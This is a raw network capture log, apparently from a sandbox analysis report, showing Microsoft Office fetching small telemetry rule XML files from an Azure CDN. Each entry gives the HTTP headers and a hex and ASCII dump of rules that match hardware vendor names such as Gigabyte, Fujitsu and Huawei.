                                                                                        2024-11-01 12:46:47 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 464
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                        x-ms-request-id: 634471bf-901e-0016-1230-2cefe9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124647Z-16dc884887bmq8qvhC1DFWy4wg00000000gg000000007n0h
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:47 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        54192.168.2.44981213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:47 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:47 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 494
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                        x-ms-request-id: 3ed937ed-001e-0065-4608-2c0b73000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124647Z-16ccfc49897jxxn9hC1DFWexyc00000000m0000000001w0p
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:47 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        55192.168.2.44981313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:48 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:48 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:48 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                        ETag: "0x8DC582B9748630E"
                                                                                        x-ms-request-id: 406e0a0b-a01e-0084-59cd-2b9ccd000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124648Z-16ccfc49897hshbrhC1DFW7g1c00000000e0000000009cw8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        56192.168.2.44981413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:48 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:48 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:48 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                        x-ms-request-id: 8644ae90-c01e-00a1-60bf-2b7e4a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124648Z-16ccfc49897cvhbphC1DFWt5d800000000pg00000000demw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:48 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        57192.168.2.44981613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:48 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:48 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:48 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                        x-ms-request-id: 4632b172-e01e-0071-11da-2b08e7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124648Z-16ccfc49897rxv9khC1DFWwn2800000000n000000000d4h1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:48 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        58192.168.2.44981713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:48 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:48 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:48 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 428
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                        x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124648Z-16ccfc498976vdjnhC1DFW5ann00000000fg00000000f5dr
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:48 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        59192.168.2.44981513.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:48 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:48 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:48 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 404
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                        x-ms-request-id: def6a666-601e-0001-6e47-2afaeb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124648Z-159b85dff8f46f6ghC1DFW1x1s00000001pg000000009d7g
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:48 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        60192.168.2.44981813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:49 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:49 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 499
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                        x-ms-request-id: e5c4cfa3-b01e-0001-3cff-2b46e2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124649Z-16dc884887b6v426hC1DFWstvw00000000ng000000004s7s
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:49 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        61192.168.2.44981913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:49 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:49 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                        x-ms-request-id: 4e15243a-401e-005b-2294-2a9c0c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124649Z-159b85dff8fj5jwshC1DFW3rgc00000002wg000000008fsz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:49 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        62192.168.2.44982013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:49 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:49 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                        x-ms-request-id: f5cab439-801e-00a3-1932-2c7cfb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124649Z-16dc884887b99jtmhC1DFWc1qc00000000gg000000002ua9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:49 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        63192.168.2.44982213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:49 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:49 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 494
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                        ETag: "0x8DC582BB8972972"
                                                                                        x-ms-request-id: 860be216-201e-0071-14dc-2aff15000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124649Z-159b85dff8fprglthC1DFW8zcg000000033g000000001cf9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
